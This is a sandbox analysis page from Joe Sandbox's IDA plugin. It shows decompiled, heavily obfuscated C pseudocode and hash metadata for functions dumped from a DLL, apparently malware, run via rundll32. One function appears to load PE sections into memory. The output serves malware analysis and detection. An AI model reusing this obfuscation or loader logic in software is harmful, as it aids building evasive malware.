                                                                        0x10014dbc
                                                                        0x10014c75
                                                                        0x10014c7b
                                                                        0x10014d6b
                                                                        0x10014d70
                                                                        0x10014d73
                                                                        0x00000000
                                                                        0x10014c81
                                                                        0x10014c81
                                                                        0x10014c87
                                                                        0x10014d42
                                                                        0x10014d47
                                                                        0x10014d4a
                                                                        0x00000000
                                                                        0x10014c8d
                                                                        0x10014c8d
                                                                        0x10014c93
                                                                        0x10014d13
                                                                        0x10014d18
                                                                        0x10014d1b
                                                                        0x00000000
                                                                        0x10014c95
                                                                        0x10014c95
                                                                        0x10014c9b
                                                                        0x10014ce6
                                                                        0x10014ceb
                                                                        0x10014cee
                                                                        0x00000000
                                                                        0x10014c9d
                                                                        0x10014c9d
                                                                        0x10014ca3
                                                                        0x00000000
                                                                        0x10014ca9
                                                                        0x10014cb1
                                                                        0x10014cb5
                                                                        0x10014cba
                                                                        0x10014cbd
                                                                        0x10014cbf
                                                                        0x10014cc5
                                                                        0x00000000
                                                                        0x10014cc5
                                                                        0x10014cbf
                                                                        0x10014ca3
                                                                        0x10014c9b
                                                                        0x10014c93
                                                                        0x10014c87
                                                                        0x00000000
                                                                        0x10014d78
                                                                        0x10014d78
                                                                        0x10014d78
                                                                        0x00000000

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: '$4N$@d$Ro$[$s*
                                                                        • API String ID: 0-3977818246
                                                                        • Opcode ID: 8b91073eb68824ad4072f87b60327b0f0f41f15647fb65faca63cf93347245e7
                                                                        • Instruction ID: 07a38d7209349fe1cc0257583510a44f39c41418860415f0518c45196b6dd939
                                                                        • Opcode Fuzzy Hash: 8b91073eb68824ad4072f87b60327b0f0f41f15647fb65faca63cf93347245e7
                                                                        • Instruction Fuzzy Hash: 930214715083818BE364CF24C489A5FFBE2FBC5758F508A1DF29A8A260D7759989CF43
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001676B, Relevance: 7.7, Strings: 6, Instructions: 223COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 96%
                                                                        			E1001676B(intOrPtr __ecx, intOrPtr* __edx) {
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				intOrPtr _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				unsigned int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _t209;
				intOrPtr* _t214;
				intOrPtr _t220;
				intOrPtr _t221;
				intOrPtr _t222;
				signed int _t225;
				intOrPtr _t227;
				intOrPtr _t228;
				signed int _t249;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				intOrPtr _t254;
				void* _t256;
				signed int _t257;
				intOrPtr _t258;
				intOrPtr _t259;
				signed int* _t260;

				_t222 = __ecx;
				_t260 =  &_v120;
				_v16 = 0x866cc;
				_v24 = __edx;
				asm("stosd");
				_v36 = _v36 & 0x00000000;
				_t256 = 0x32e15263;
				_v40 = __ecx;
				asm("stosd");
				asm("stosd");
				_v88 = 0x4c86;
				_v88 = _v88 >> 8;
				_v88 = _v88 + 0x4743;
				_v88 = _v88 ^ 0x00006c64;
				_v56 = 0x7209;
				_t249 = 0x2f;
				_v56 = _v56 / _t249;
				_v56 = _v56 ^ 0x00004ba4;
				_v104 = 0x1d35;
				_v104 = _v104 ^ 0x1719f2b3;
				_t250 = 0x70;
				_v104 = _v104 / _t250;
				_v104 = _v104 ^ 0x0034fe7c;
				_v108 = 0x850d;
				_t251 = 0x4b;
				_v108 = _v108 / _t251;
				_v108 = _v108 + 0xffff881b;
				_v108 = _v108 ^ 0xffffc0d4;
				_v76 = 0x9106;
				_v76 = _v76 ^ 0x4d359ade;
				_v76 = _v76 ^ 0x4d353ffa;
				_v100 = 0x5c6a;
				_v100 = _v100 + 0xffffc429;
				_t252 = 0x47;
				_v100 = _v100 / _t252;
				_v100 = _v100 ^ 0x000075a2;
				_v120 = 0xfdde;
				_v120 = _v120 + 0xffff2d79;
				_v120 = _v120 << 8;
				_v120 = _v120 + 0x72a3;
				_v120 = _v120 ^ 0x002bcffe;
				_v68 = 0x65b6;
				_v68 = _v68 ^ 0xa03a7dbc;
				_v68 = _v68 ^ 0xa03a0006;
				_v72 = 0x17a;
				_v72 = _v72 | 0xe4ec8cce;
				_v72 = _v72 ^ 0xe4ecfb88;
				_v96 = 0x4e8;
				_v96 = _v96 + 0x12c;
				_v96 = _v96 * 0x46;
				_v96 = _v96 ^ 0x00018935;
				_v60 = 0xff48;
				_v60 = _v60 | 0x2f82106f;
				_v60 = _v60 ^ 0x2f82b48b;
				_v64 = 0xb5da;
				_v64 = _v64 ^ 0xd090b991;
				_v64 = _v64 ^ 0xd0906a5c;
				_v116 = 0xf7aa;
				_v116 = _v116 >> 0xb;
				_v116 = _v116 + 0x5870;
				_v116 = _v116 << 4;
				_v116 = _v116 ^ 0x000599f3;
				_v92 = 0xc80a;
				_t253 = 0x33;
				_t259 = _v24;
				_t221 = _v24;
				_v92 = _v92 * 0x56;
				_v92 = _v92 + 0x14d;
				_v92 = _v92 ^ 0x004333b4;
				_v112 = 0x930e;
				_v112 = _v112 >> 0xe;
				_t254 = _v20;
				_v112 = _v112 / _t253;
				_v112 = _v112 * 0x2c;
				_v112 = _v112 ^ 0x00000167;
				_v48 = 0x7ef;
				_v48 = _v48 + 0x7f73;
				_v48 = _v48 ^ 0x00009a09;
				_v84 = 0x8c86;
				_v84 = _v84 * 0x14;
				_v84 = _v84 * 0x18;
				_v84 = _v84 ^ 0x01070a49;
				_v52 = 0xdc0;
				_v52 = _v52 | 0x8738231d;
				_v52 = _v52 ^ 0x873814a6;
				_v44 = 0xb7c7;
				_v44 = _v44 | 0xf6a52020;
				_v44 = _v44 ^ 0xf6a5b7e7;
				L1:
				while(1) {
					do {
						while(_t256 != 0x43b6c7f) {
							if(_t256 == 0x2e16d409) {
								_t225 = E1001CD07(_t222, _v104, _v108, _t209,  &_v32, _v76, _t259);
								_t260 =  &(_t260[5]);
								_v36 = _t225;
								if(_t225 == 0) {
									_t257 = _v36;
									L20:
									E100091CD(_v112, _v48, _v84, _t221, _v52);
								} else {
									_t227 = _v32;
									if(_t227 == 0) {
										goto L16;
									} else {
										_v80 = _v80 + _t227;
										_t259 = _t259 - _t227;
										if(_t259 != 0) {
											L10:
											_t209 = _v80;
											L11:
											_t222 = _v40;
											_t256 = 0x2e16d409;
											continue;
										} else {
											_t228 = _t254 + _t254;
											_push(_t228);
											_v28 = _t228;
											_t258 = E100157E8(_t228);
											if(_t258 == 0) {
												goto L16;
											} else {
												E10009970(_v68, _t221, _v72, _t258, _t254, _v96);
												E100091CD(_v60, _v64, _v116, _t221, _v92);
												_t259 = _t254;
												_t220 = _t258 + _t254;
												_t254 = _v28;
												_t260 =  &(_t260[7]);
												_v80 = _t220;
												_t221 = _t258;
												if(_t259 == 0) {
													goto L16;
												} else {
													goto L10;
												}
											}
										}
									}
								}
							} else {
								if(_t256 != 0x32e15263) {
									goto L15;
								} else {
									_t256 = 0x43b6c7f;
									continue;
								}
							}
							L18:
							return _t257;
						}
						_t254 = 0x10000;
						_push(_t222);
						_t209 = E100157E8(0x10000);
						_t221 = _t209;
						if(_t221 == 0) {
							_t222 = _v40;
							_t256 = 0x166bd62c;
							goto L15;
						} else {
							_v80 = _t209;
							_t259 = 0x10000;
							goto L11;
						}
						goto L18;
						L15:
						_t209 = _v80;
					} while (_t256 != 0x166bd62c);
					L16:
					_t257 = _v36;
					if(_t257 == 0) {
						goto L20;
					} else {
						_t214 = _v24;
						 *_t214 = _t221;
						 *((intOrPtr*)(_t214 + 4)) = _t254 - _t259;
					}
					goto L18;
				}
			}


















































                                                                        0x1001676b
                                                                        0x1001676b
                                                                        0x1001676e
                                                                        0x10016780
                                                                        0x10016784
                                                                        0x10016789
                                                                        0x1001678e
                                                                        0x10016793
                                                                        0x10016797
                                                                        0x10016798
                                                                        0x10016799
                                                                        0x100167a1
                                                                        0x100167a6
                                                                        0x100167ae
                                                                        0x100167b6
                                                                        0x100167c2
                                                                        0x100167c7
                                                                        0x100167cd
                                                                        0x100167d5
                                                                        0x100167dd
                                                                        0x100167e9
                                                                        0x100167ee
                                                                        0x100167f4
                                                                        0x100167fc
                                                                        0x10016808
                                                                        0x1001680d
                                                                        0x10016813
                                                                        0x1001681b
                                                                        0x10016823
                                                                        0x1001682b
                                                                        0x10016833
                                                                        0x1001683b
                                                                        0x10016843
                                                                        0x1001684f
                                                                        0x10016852
                                                                        0x10016856
                                                                        0x1001685e
                                                                        0x10016866
                                                                        0x1001686e
                                                                        0x10016873
                                                                        0x1001687b
                                                                        0x10016883
                                                                        0x1001688b
                                                                        0x10016893
                                                                        0x1001689b
                                                                        0x100168a3
                                                                        0x100168ab
                                                                        0x100168b3
                                                                        0x100168bb
                                                                        0x100168c8
                                                                        0x100168cc
                                                                        0x100168d4
                                                                        0x100168dc
                                                                        0x100168e4
                                                                        0x100168ec
                                                                        0x100168f4
                                                                        0x100168fc
                                                                        0x10016904
                                                                        0x1001690c
                                                                        0x10016911
                                                                        0x10016919
                                                                        0x10016920
                                                                        0x10016928
                                                                        0x10016937
                                                                        0x10016938
                                                                        0x1001693c
                                                                        0x10016940
                                                                        0x10016944
                                                                        0x1001694c
                                                                        0x10016954
                                                                        0x1001695c
                                                                        0x10016967
                                                                        0x1001696b
                                                                        0x10016974
                                                                        0x10016978
                                                                        0x10016980
                                                                        0x10016988
                                                                        0x10016990
                                                                        0x10016998
                                                                        0x100169a5
                                                                        0x100169ae
                                                                        0x100169b2
                                                                        0x100169be
                                                                        0x100169c6
                                                                        0x100169ce
                                                                        0x100169d6
                                                                        0x100169de
                                                                        0x100169e6
                                                                        0x00000000
                                                                        0x100169ee
                                                                        0x100169ee
                                                                        0x100169ee
                                                                        0x10016a00
                                                                        0x10016a2d
                                                                        0x10016a2f
                                                                        0x10016a32
                                                                        0x10016a38
                                                                        0x10016b22
                                                                        0x10016b26
                                                                        0x10016b37
                                                                        0x10016a3e
                                                                        0x10016a3e
                                                                        0x10016a44
                                                                        0x00000000
                                                                        0x10016a4a
                                                                        0x10016a4a
                                                                        0x10016a4e
                                                                        0x10016a50
                                                                        0x10016ab6
                                                                        0x10016ab6
                                                                        0x10016aba
                                                                        0x10016aba
                                                                        0x10016abe
                                                                        0x00000000
                                                                        0x10016a52
                                                                        0x10016a56
                                                                        0x10016a5d
                                                                        0x10016a5e
                                                                        0x10016a67
                                                                        0x10016a6c
                                                                        0x00000000
                                                                        0x10016a72
                                                                        0x10016a82
                                                                        0x10016a98
                                                                        0x10016a9d
                                                                        0x10016a9f
                                                                        0x10016aa2
                                                                        0x10016aa9
                                                                        0x10016aac
                                                                        0x10016ab0
                                                                        0x10016ab4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10016ab4
                                                                        0x10016a6c
                                                                        0x10016a50
                                                                        0x10016a44
                                                                        0x10016a02
                                                                        0x10016a08
                                                                        0x00000000
                                                                        0x10016a0e
                                                                        0x10016a0e
                                                                        0x00000000
                                                                        0x10016a0e
                                                                        0x10016a08
                                                                        0x10016b19
                                                                        0x10016b21
                                                                        0x10016b21
                                                                        0x10016acc
                                                                        0x10016ad5
                                                                        0x10016ad8
                                                                        0x10016add
                                                                        0x10016ae2
                                                                        0x10016aec
                                                                        0x10016af0
                                                                        0x00000000
                                                                        0x10016ae4
                                                                        0x10016ae4
                                                                        0x10016ae8
                                                                        0x00000000
                                                                        0x10016ae8
                                                                        0x00000000
                                                                        0x10016af5
                                                                        0x10016af5
                                                                        0x10016af9
                                                                        0x10016b05
                                                                        0x10016b05
                                                                        0x10016b0b
                                                                        0x00000000
                                                                        0x10016b0d
                                                                        0x10016b0d
                                                                        0x10016b13
                                                                        0x10016b15
                                                                        0x10016b15
                                                                        0x00000000
                                                                        0x10016b0b

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: r$cR2$cR2$dl$j\$pX
                                                                        • API String ID: 0-1990883307
                                                                        • Opcode ID: 5afea401a38fb3ed9ab9e3cfea92ea9d8ff477060cd6098b2c0c0ba7b7ad2f6f
                                                                        • Instruction ID: abaabab29ae1ed465508f17d184fa830ec2d5e61d89a70c706a4c59ec083da4e
                                                                        • Opcode Fuzzy Hash: 5afea401a38fb3ed9ab9e3cfea92ea9d8ff477060cd6098b2c0c0ba7b7ad2f6f
                                                                        • Instruction Fuzzy Hash: 49A130B19093819BD354CF25C98580BFBE1FBC8798F108A2DF5959A260C3B5DA49CF83
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10005BE1, Relevance: 7.7, Strings: 6, Instructions: 172COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 94%
                                                                        			E10005BE1(void* __ecx, intOrPtr* __edx, void* __eflags, intOrPtr _a8) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				void* _t161;
				void* _t180;
				void* _t190;
				void* _t192;
				signed int _t194;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				void* _t227;
				void* _t232;
				intOrPtr* _t234;
				signed int* _t236;
				signed int* _t237;
				signed int* _t238;

				_push(_a8);
				_t234 = __edx;
				_push(0);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t161);
				_v16 = 0x1b4e;
				_v16 = _v16 ^ 0xc2117ce7;
				_v16 = _v16 ^ 0xc21177a9;
				_v20 = 0x4ee4;
				_t194 = 0x69;
				_v20 = _v20 / _t194;
				_v20 = _v20 ^ 0x000020c0;
				_v28 = 0x719b;
				_v28 = _v28 + 0x9810;
				_v28 = _v28 ^ 0x00016243;
				_v36 = 0xcf79;
				_v36 = _v36 << 4;
				_v36 = _v36 + 0x818a;
				_v36 = _v36 ^ 0x000d705e;
				_v40 = 0x5a4d;
				_v40 = _v40 + 0x4c3f;
				_t195 = 0x28;
				_v40 = _v40 * 0x4c;
				_v40 = _v40 ^ 0x0031666b;
				_v64 = 0x8d9a;
				_v64 = _v64 / _t195;
				_t196 = 0x5f;
				_v64 = _v64 / _t196;
				_t197 = 0x63;
				_v64 = _v64 * 0x23;
				_v64 = _v64 ^ 0x000027a7;
				_v12 = 0x746d;
				_v12 = _v12 / _t197;
				_v12 = _v12 ^ 0x00006093;
				_v60 = 0x2db8;
				_v60 = _v60 | 0xa376fc52;
				_v60 = _v60 >> 8;
				_v60 = _v60 ^ 0x00a31548;
				_v24 = 0xbe89;
				_v24 = _v24 + 0xfffffabc;
				_v24 = _v24 ^ 0x0000f7c2;
				_v48 = 0x7924;
				_v48 = _v48 + 0x8930;
				_t198 = 0x7b;
				_v48 = _v48 * 0x60;
				_v48 = _v48 << 0xb;
				_v48 = _v48 ^ 0x06fc5745;
				_v52 = 0x6da;
				_v52 = _v52 / _t198;
				_v52 = _v52 >> 2;
				_v52 = _v52 + 0xffffc306;
				_v52 = _v52 ^ 0xffffa7a2;
				_v32 = 0xa776;
				_v32 = _v32 << 0xb;
				_v32 = _v32 ^ 0x9264e448;
				_v32 = _v32 ^ 0x975f0f13;
				_v4 = 0x5f13;
				_v4 = _v4 >> 2;
				_v4 = _v4 ^ 0x00006c09;
				_v8 = 0xd9b4;
				_t199 = 0x7d;
				_v8 = _v8 / _t199;
				_v8 = _v8 ^ 0x00001d23;
				_v44 = 0xe400;
				_v44 = _v44 | 0xbfff2ffd;
				_t200 = 3;
				_v44 = _v44 / _t200;
				_v44 = _v44 ^ 0x3fffd239;
				_v56 = 0xf54;
				_v56 = _v56 + 0xffffced3;
				_v56 = _v56 + 0x8d94;
				_v56 = _v56 ^ 0xc5d6359f;
				_v56 = _v56 ^ 0xc5d65e64;
				_t180 = E100073F9(_v28, _v36, _v40, _v64, __edx);
				_t190 = _t180;
				_t236 =  &(( &_v64)[7]);
				if(_t190 != 0) {
					_t227 = E1000204B(_v56, _v12,  *((intOrPtr*)(_t190 + 0x50)), _v20 | _v16, _v60, _v24);
					_t237 =  &(_t236[5]);
					if(_t227 == 0) {
						L6:
						return _t227;
					}
					E10009970(_v48,  *_t234, _v52, _t227,  *((intOrPtr*)(_t190 + 0x54)), _v32);
					_t238 =  &(_t237[4]);
					_t232 = ( *(_t190 + 0x14) & 0x0000ffff) + 0x18 + _t190;
					_t192 = ( *(_t190 + 6) & 0x0000ffff) * 0x28 + _t232;
					while(_t232 < _t192) {
						_t188 =  <  ?  *((void*)(_t232 + 8)) :  *((intOrPtr*)(_t232 + 0x10));
						E10009970(_v4,  *((intOrPtr*)(_t232 + 0x14)) +  *_t234, _v8,  *((intOrPtr*)(_t232 + 0xc)) + _t227,  <  ?  *((void*)(_t232 + 8)) :  *((intOrPtr*)(_t232 + 0x10)), _v44);
						_t238 =  &(_t238[4]);
						_t232 = _t232 + 0x28;
					}
					goto L6;
				}
				return _t180;
			}




































                                                                        0x10005be6
                                                                        0x10005bea
                                                                        0x10005bec
                                                                        0x10005bee
                                                                        0x10005bef
                                                                        0x10005bf0
                                                                        0x10005bf5
                                                                        0x10005bff
                                                                        0x10005c07
                                                                        0x10005c0f
                                                                        0x10005c1d
                                                                        0x10005c22
                                                                        0x10005c28
                                                                        0x10005c30
                                                                        0x10005c38
                                                                        0x10005c40
                                                                        0x10005c48
                                                                        0x10005c50
                                                                        0x10005c55
                                                                        0x10005c5d
                                                                        0x10005c65
                                                                        0x10005c6d
                                                                        0x10005c7a
                                                                        0x10005c7d
                                                                        0x10005c81
                                                                        0x10005c89
                                                                        0x10005c99
                                                                        0x10005ca1
                                                                        0x10005ca6
                                                                        0x10005cb1
                                                                        0x10005cb4
                                                                        0x10005cb8
                                                                        0x10005cc0
                                                                        0x10005cd0
                                                                        0x10005cd4
                                                                        0x10005cdc
                                                                        0x10005ce4
                                                                        0x10005cec
                                                                        0x10005cf1
                                                                        0x10005cf9
                                                                        0x10005d01
                                                                        0x10005d09
                                                                        0x10005d11
                                                                        0x10005d19
                                                                        0x10005d26
                                                                        0x10005d27
                                                                        0x10005d2b
                                                                        0x10005d30
                                                                        0x10005d38
                                                                        0x10005d46
                                                                        0x10005d4a
                                                                        0x10005d4f
                                                                        0x10005d57
                                                                        0x10005d5f
                                                                        0x10005d67
                                                                        0x10005d6c
                                                                        0x10005d74
                                                                        0x10005d7e
                                                                        0x10005d86
                                                                        0x10005d8b
                                                                        0x10005d93
                                                                        0x10005da1
                                                                        0x10005da6
                                                                        0x10005dac
                                                                        0x10005db4
                                                                        0x10005dbc
                                                                        0x10005dc8
                                                                        0x10005dcc
                                                                        0x10005dd0
                                                                        0x10005dd8
                                                                        0x10005de0
                                                                        0x10005de8
                                                                        0x10005df0
                                                                        0x10005df8
                                                                        0x10005e10
                                                                        0x10005e15
                                                                        0x10005e17
                                                                        0x10005e1c
                                                                        0x10005e44
                                                                        0x10005e46
                                                                        0x10005e4b
                                                                        0x10005eb0
                                                                        0x00000000
                                                                        0x10005eb2
                                                                        0x10005e61
                                                                        0x10005e6a
                                                                        0x10005e74
                                                                        0x10005e79
                                                                        0x10005eab
                                                                        0x10005e92
                                                                        0x10005ea0
                                                                        0x10005ea5
                                                                        0x10005ea8
                                                                        0x10005ea8
                                                                        0x00000000
                                                                        0x10005eaf
                                                                        0x10005eb8

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: l$$y$^p$kf1$mt$N
                                                                        • API String ID: 0-2826323611
                                                                        • Opcode ID: 990bd43fce18d13703470070e4ea28ead3db5627c1d4020e323a10ed1f143b64
                                                                        • Instruction ID: b087b2a7bdd9e8b1e5a607b88e6e493accb252ae43d71ee7b54195949d735030
                                                                        • Opcode Fuzzy Hash: 990bd43fce18d13703470070e4ea28ead3db5627c1d4020e323a10ed1f143b64
                                                                        • Instruction Fuzzy Hash: 947124715093409BE358CF65C98991BFBF2FBC4758F008A1DF589862A0D7B6D945CF42
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10005856, Relevance: 7.7, Strings: 6, Instructions: 168COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 98%
                                                                        			E10005856(void* __ecx, void* __edi, void* __eflags) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				unsigned int _v56;
				signed int _v60;
				signed int _v64;
				signed int _t207;
				signed int _t209;
				int _t213;
				void* _t216;
				signed int _t217;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				signed int _t225;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t233;
				void* _t262;
				void* _t266;
				signed int _t268;

				_v20 = 0xe5e9;
				_v20 = _v20 >> 1;
				_v20 = _v20 ^ 0x000072fc;
				_v60 = 0xeee;
				_t266 = __ecx;
				_t219 = 0xb;
				_v60 = _v60 / _t219;
				_t220 = 0x2d;
				_v60 = _v60 / _t220;
				_v60 = _v60 << 0xa;
				_v60 = _v60 ^ 0x00001c10;
				_v36 = 0x52f6;
				_v36 = _v36 ^ 0x4f1b66f5;
				_t221 = 0x42;
				_v36 = _v36 * 0x69;
				_v36 = _v36 ^ 0x72285533;
				_v12 = 0x9a21;
				_v12 = _v12 | 0x390e9e30;
				_v12 = _v12 ^ 0x390e9e21;
				_v64 = 0x3c55;
				_v64 = _v64 / _t221;
				_v64 = _v64 + 0xffff9cac;
				_v64 = _v64 << 2;
				_v64 = _v64 ^ 0xfffe1a99;
				_v44 = 0xe171;
				_v44 = _v44 | 0xc7bc5698;
				_t222 = 0x66;
				_v44 = _v44 / _t222;
				_v44 = _v44 ^ 0x01f52ba1;
				_v40 = 0x30e3;
				_v40 = _v40 ^ 0xbd01c268;
				_v40 = _v40 ^ 0x5fce1aa6;
				_v40 = _v40 ^ 0xe2cffd7a;
				_v24 = 0x83cc;
				_t223 = 0x5f;
				_v24 = _v24 / _t223;
				_v24 = _v24 ^ 0x00004c9a;
				_v56 = 0x8dff;
				_t224 = 0x7e;
				_v56 = _v56 / _t224;
				_v56 = _v56 | 0x1e081a33;
				_v56 = _v56 >> 0xa;
				_v56 = _v56 ^ 0x0007b8c6;
				_v16 = 0x76f3;
				_t225 = 0x52;
				_v16 = _v16 / _t225;
				_v16 = _v16 ^ 0x00007e48;
				_v48 = 0xd814;
				_t226 = 0x1a;
				_v48 = _v48 / _t226;
				_v48 = _v48 >> 5;
				_v48 = _v48 | 0x7e8c2f48;
				_v48 = _v48 ^ 0x7e8c1b4f;
				_v28 = 0x13ee;
				_t227 = 0x75;
				_v28 = _v28 / _t227;
				_v28 = _v28 + 0xffff1a4e;
				_v28 = _v28 ^ 0xffff6e25;
				_v8 = 0x2381;
				_v8 = _v8 + 0xffff7415;
				_v8 = _v8 ^ 0xffffaad1;
				_v32 = 0x9c03;
				_t228 = 0x2a;
				_v32 = _v32 / _t228;
				_v32 = _v32 >> 4;
				_v32 = _v32 ^ 0x00002dee;
				_v52 = 0xdc3f;
				_v52 = _v52 >> 0xb;
				_v52 = _v52 ^ 0xda865163;
				_v52 = _v52 * 0x7a;
				_v52 = _v52 ^ 0x2402d330;
				_v4 = E10017B6B();
				_t216 = _v20 + E10017B6B() % _v60;
				_t207 = E10017B6B();
				_t209 = _v52;
				_t268 = _v36 + _t207 % _v12;
				if(_t209 < _t216) {
					_t217 = _t216 - _t209;
					_t262 = _t266;
					_t233 = _t217 >> 1;
					_t213 = memset(_t262, 0x2d002d, _t233 << 2);
					asm("adc ecx, ecx");
					_t266 = _t266 + _t217 * 2;
					memset(_t262 + _t233, _t213, 0);
				}
				E100060DA( &_v4, _v48, 3, _t268, _v28, _v8, _v32, _t266);
				 *((short*)(_t266 + _t268 * 2)) = 0;
				return 0;
			}






































                                                                        0x10005859
                                                                        0x10005863
                                                                        0x10005867
                                                                        0x1000586f
                                                                        0x10005880
                                                                        0x10005882
                                                                        0x10005887
                                                                        0x10005891
                                                                        0x10005896
                                                                        0x1000589c
                                                                        0x100058a1
                                                                        0x100058a9
                                                                        0x100058b1
                                                                        0x100058be
                                                                        0x100058c1
                                                                        0x100058c5
                                                                        0x100058cd
                                                                        0x100058d5
                                                                        0x100058dd
                                                                        0x100058e5
                                                                        0x100058f5
                                                                        0x100058f9
                                                                        0x10005901
                                                                        0x10005906
                                                                        0x1000590e
                                                                        0x10005916
                                                                        0x10005922
                                                                        0x10005927
                                                                        0x1000592d
                                                                        0x10005935
                                                                        0x1000593d
                                                                        0x10005945
                                                                        0x1000594d
                                                                        0x10005955
                                                                        0x10005961
                                                                        0x10005966
                                                                        0x1000596c
                                                                        0x10005974
                                                                        0x10005980
                                                                        0x10005985
                                                                        0x1000598b
                                                                        0x10005993
                                                                        0x10005998
                                                                        0x100059a0
                                                                        0x100059ac
                                                                        0x100059af
                                                                        0x100059b3
                                                                        0x100059bb
                                                                        0x100059cb
                                                                        0x100059d0
                                                                        0x100059d6
                                                                        0x100059db
                                                                        0x100059e3
                                                                        0x100059eb
                                                                        0x100059f7
                                                                        0x100059fc
                                                                        0x10005a02
                                                                        0x10005a0a
                                                                        0x10005a12
                                                                        0x10005a1a
                                                                        0x10005a22
                                                                        0x10005a2a
                                                                        0x10005a36
                                                                        0x10005a39
                                                                        0x10005a3d
                                                                        0x10005a42
                                                                        0x10005a4a
                                                                        0x10005a52
                                                                        0x10005a57
                                                                        0x10005a64
                                                                        0x10005a68
                                                                        0x10005a7d
                                                                        0x10005a9e
                                                                        0x10005aa4
                                                                        0x10005ab5
                                                                        0x10005ab9
                                                                        0x10005abd
                                                                        0x10005abf
                                                                        0x10005ac9
                                                                        0x10005acb
                                                                        0x10005acd
                                                                        0x10005acf
                                                                        0x10005ad1
                                                                        0x10005ad4
                                                                        0x10005ad7
                                                                        0x10005af0
                                                                        0x10005afa
                                                                        0x10005b04

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000007.00000002.2115673692.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000007.00000002.2115686950.0000000010021000.00000040.00000001.sdmp Download File
                                                                        • Associated: 00000007.00000002.2115690629.0000000010023000.00000040.00000001.sdmp Download File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 3U(r$H~$U<$q$-$0
                                                                        • API String ID: 0-112106996
                                                                        • Opcode ID: a14db494ac1d1924fb546390b44814837310fb5a009353283d47587c83f43a78
                                                                        • Instruction ID: f4907ee1585d44d3942ec58e3a4e8cb82ff1253e3bf876b76615309baba7f8ab
                                                                        • Opcode Fuzzy Hash: a14db494ac1d1924fb546390b44814837310fb5a009353283d47587c83f43a78
                                                                        • Instruction Fuzzy Hash: 037134716083419FE348CF25D88A50BBBF2FBC8748F10891DF1999A2A0D7B5DA598F46
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10004BDE, Relevance: 7.7, Strings: 6, Instructions: 158COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 91%
                                                                        			E10004BDE(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				void* _t127;
				intOrPtr _t142;
				void* _t145;
				void* _t148;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				signed int _t167;
				void* _t169;
				signed int* _t172;

